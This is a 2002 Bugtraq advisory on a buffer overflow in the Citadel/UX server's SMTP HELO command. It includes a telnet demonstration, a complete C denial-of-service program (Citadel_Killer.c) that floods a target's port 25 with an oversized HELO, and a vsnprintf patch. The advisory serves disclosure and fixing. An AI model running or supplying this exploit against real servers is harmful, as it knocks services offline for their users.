Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Citadel/UX Server Remote DoS attack Vulnerability

From: xperc <xperc () hotmail com>
Date: 9 Mar 2002 23:10:15 -0000



What is Citadel/UX:

Citadel/UX is an advanced client/server BBS program 
for operating highly interactive sites, both on the 
Internet and over dialup. Users can connect to 
Citadel/UX using any of telnet, WWW, or client 
software. Among the features supported are public 
and private message bases (rooms), electronic mail, 
real-time chat, paging, etc. The server is 
multithreaded and can easily support a large number 
of concurrent users. In addition, SMTP and POP3 
servers are built-in for easy connection to Internet 
mail. Citadel/UX is both robust and mature, having 
been developed over the course of the past twelve 
years.

Problem:
I has found a buffer overflow in the Citadel/UX server. 
an attacker can execute a denial of service attack 
against it. Once the big buffer has been sent, the 
server is vulnerable.

Example:
[xperc@security citadel]$telnet 192.168.0.3 25
Trying 192.168.0.3...
Connected to 192.168.0.3.
Escape character is '^]'.
220 security ESMTP Citadel/UX server ready.
helo [buffer]


[buffer] is around 4096 characters. 


/* Citadel_Killer.c
 *
 * Remote Denial of Service Citadel/UX Server.  
 * 
 *              by xperc () hotmail com
 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MAXBUF          8000 
#define MAXBUF2         MAXBUF+6
#define RECVBUF         256
#define CIT_SMTP        25      

int main(int argc, char *argv[])
{
        int sockfd;
        char msg[RECVBUF],buf[MAXBUF],sendbuf
[MAXBUF2];
        struct sockaddr_in target;

        if(argc!=2){
                fprintf(stderr,"Usage: %s 
target_address\n",*argv);
                exit(-1);
        }
        if((sockfd=socket
(AF_INET,SOCK_STREAM,0))<0){
                perror("socket");
                exit(-1);
        }
        target.sin_family=AF_INET;
        target.sin_port=htons(CIT_SMTP);
        target.sin_addr.s_addr=inet_addr(argv[1]);
        if(connect(sockfd,(struct sockaddr*)
&target,sizeof(target))<0){
                perror("connect");
                exit(-1);       
        }
        if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){
                perror("recv");
                exit(-1);
        }

        memset(buf,'a',MAXBUF);
        snprintf(sendbuf,sizeof(sendbuf),"helo %
s",buf);
        strcat(sendbuf,"\n");

        send(sockfd,sendbuf,strlen(sendbuf),0);
        close(sockfd);

        return 0;
}

Patch for this Vulnerability:
--- citadel-old/sysdep.c        Sat Dec  8 12:31:44 
2001
+++ citadel/sysdep.c    Sat Mar  9 05:51:11 
2002
@@ -106,7 +106,7 @@
        char buf[4096];
   
         va_start(arg_ptr, format);   
-        vsprintf(buf, format, arg_ptr);   
+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   
         va_end(arg_ptr);   
 
        if (loglevel <= verbosity) {
Previous By Date Next
Previous By Thread Next

Current thread: